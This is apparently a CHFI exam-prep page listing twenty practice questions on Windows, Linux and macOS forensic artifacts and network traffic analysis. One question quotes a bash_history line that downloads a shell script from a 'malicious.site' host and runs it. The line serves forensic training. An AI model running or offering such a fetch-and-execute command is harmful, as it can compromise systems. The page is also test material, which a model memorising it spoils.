Courseiva

CHFI · topic practice

OS and Network Forensics practice questions

This domain covers collecting and interpreting evidence from operating systems and network traffic: Windows registry persistence, USB artifacts, Linux authentication logs, and TCP handshake analysis in Wireshark. Questions present a scenario or artifact and ask you to identify its purpose, source, or meaning, so you must recognize real forensic indicators rather than recall theory.

Courseiva uses original exam-style practice questions designed for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps.

Editorial oversight:Johnson Ajibi· MSc IT Security, IEEE Senior Member
20 questionsDomain: OS and Network Forensics

What the exam tests

What to know about OS and Network Forensics

Be able to map an artifact or packet to its forensic meaning: identify persistence keys, USB insertion evidence, Linux auth logs, and TCP flags. The single most important skill is reading the scenario literally and matching it to the correct artifact or protocol behavior.

Windows Run key (HKCU\...\CurrentVersion\Run) as a persistence and autostart mechanism

USBSTOR registry key and setupapi.dev.log for USB device insertion history

Linux /var/log/auth.log as the primary authentication and sudo event source

TCP three-way handshake and RST interpretation in Wireshark packet captures

Watch out for

Common OS and Network Forensics exam traps

  • ▸Confusing the Run key with services or scheduled tasks; the Run key executes at user logon, not boot or on a timer.
  • ▸Choosing only one USB artifact when the question asks for TWO; USBSTOR and setupapi.dev.log are the standard pair.
  • ▸Misreading an RST after SYN/SYN-ACK as a completed connection instead of a refused or aborted one.

Practice set

OS and Network Forensics questions

20 questions · select your answer, then reveal the explanation

A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?

In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?

Which of the following Windows registry keys is commonly used by malware to achieve persistence by executing a program at user logon?

Which TWO Linux log files are MOST relevant for investigating authentication events and user login activity? (Choose TWO.)

During a Windows forensic investigation, an analyst finds a registry key under NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count. What type of artifact is this, and what information does it typically contain?

A forensic examiner needs to extract timeline data from a compromised Linux system for analysis with log2timeline/Plaso. Which of the following command sequences should be used?

During a Mac OS X forensic investigation, an analyst wants to review user application usage and system events for the last week. Which artifact provides a centralized, binary log of these activities?

In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?

A security analyst needs to examine network traffic for signs of a data exfiltration attempt. Which tool is specifically designed for deep packet inspection and can reconstruct TCP streams?

In network forensics, which type of log is BEST for identifying all outbound connections from internal hosts to external IP addresses on specific ports?

A forensic analyst is investigating a Windows system for persistence mechanisms. Which TWO registry locations are commonly used by malware to achieve auto-start? (Select TWO.)

Which TWO of the following artifacts are used for timeline analysis in digital forensics? (Select two.)

During a forensic investigation of a compromised Linux server, the investigator examines the bash_history file of the root user. She finds the command: wget http://malicious.site/shell.sh && chmod +x shell.sh && ./shell.sh. What is the MOST likely intent of this command sequence?

A forensic investigator is examining a Mac system and wants to review recently accessed files and applications. Which macOS artifact is MOST useful for this purpose?

An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?

Which THREE of the following are common persistence mechanisms found in Linux systems? (Select three.)

During an incident response on a Linux server, you find the following entry in /var/log/auth.log: "Mar 10 12:34:56 server sshd[1234]: Failed password for root from 10.0.0.5 port 34567 ssh2". Which of the following is the BEST immediate action to prevent further unauthorized access?

A forensic analyst is examining a Mac system for evidence of recent file access. Which artifact provides a timeline of file system events with high precision and is commonly analyzed using tools like mac_apt?

A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?

During a forensic investigation of a Windows 10 system, an examiner finds the following registry key: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count. The values contain Rot‑13 encoded data. What is the primary purpose of this artifact?

Free account

Track your progress over time

Create a free account to save your results and see which topics improve across sessions.

Focused OS and Network Forensics sessions

Start a OS and Network Forensics only practice session

Every question in these sessions is drawn from the OS and Network Forensics domain — nothing else.

Related practice questions

Related CHFI topic practice pages

Move into related areas when this topic feels solid.

Frequently asked questions

What does the CHFI exam test about OS and Network Forensics?
Be able to map an artifact or packet to its forensic meaning: identify persistence keys, USB insertion evidence, Linux auth logs, and TCP flags. The single most important skill is reading the scenario literally and matching it to the correct artifact or protocol behavior.
How should I use these practice questions?
Select your answer before revealing the explanation. Then read why each option is right or wrong — this active recall approach builds retention far faster than re-reading notes.
Can I practise just OS and Network Forensics questions in a focused session?
Yes — the session launcher on this page draws every question from the OS and Network Forensics domain. Use a 10-question session first to gauge your baseline, then move to 20 or 30 once the weak spots are clear.
Where can I practise other CHFI topics?
Use the topic links above to move to related areas, or go back to the CHFI question bank to see all topics.
Are these real exam questions or dumps?
These are original practice questions written to test the same concepts the CHFI exam covers. They are not copied from any real exam or dump site.